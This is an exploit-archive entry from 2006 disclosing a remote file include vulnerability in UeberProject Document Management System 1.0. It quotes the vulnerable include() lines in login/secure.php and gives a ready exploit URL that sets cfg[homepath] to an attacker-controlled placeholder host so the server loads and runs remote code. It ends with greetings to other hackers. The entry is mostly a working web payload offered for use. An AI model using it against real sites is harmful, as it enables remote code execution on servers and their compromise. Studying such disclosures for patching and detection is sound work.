UeberProject <= 1.0 (login/secure.php) Remote File Include Vulnerability

2006-10-24T00:00:00
ID 1337DAY-ID-1056
Type zdt
Reporter xoron
Modified 2006-10-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================================
UeberProject <= 1.0 (login/secure.php) Remote File Include Vulnerability
========================================================================



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Uber Project Document Management System (secure.php) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: xoron

Tum islam aleminin Ramazan Bayrami Mubarek oLsun..!


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE: in secure.php

line 12: $cfgRealProgDir =  $cfg[homepath].$cfgProgDir2;

line 113: include($cfgRealProgDir . "lng/" . $languageFile);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[script_path]/login/secure.php?cfg[homepath]=http://evil_script ?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: kacper, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, k1tk4t, x_w0x,OG

Tesekkurler: DJR, mdx, R3D4C!D, sakkure, ERNE:)



#  0day.today [2018-01-03]  #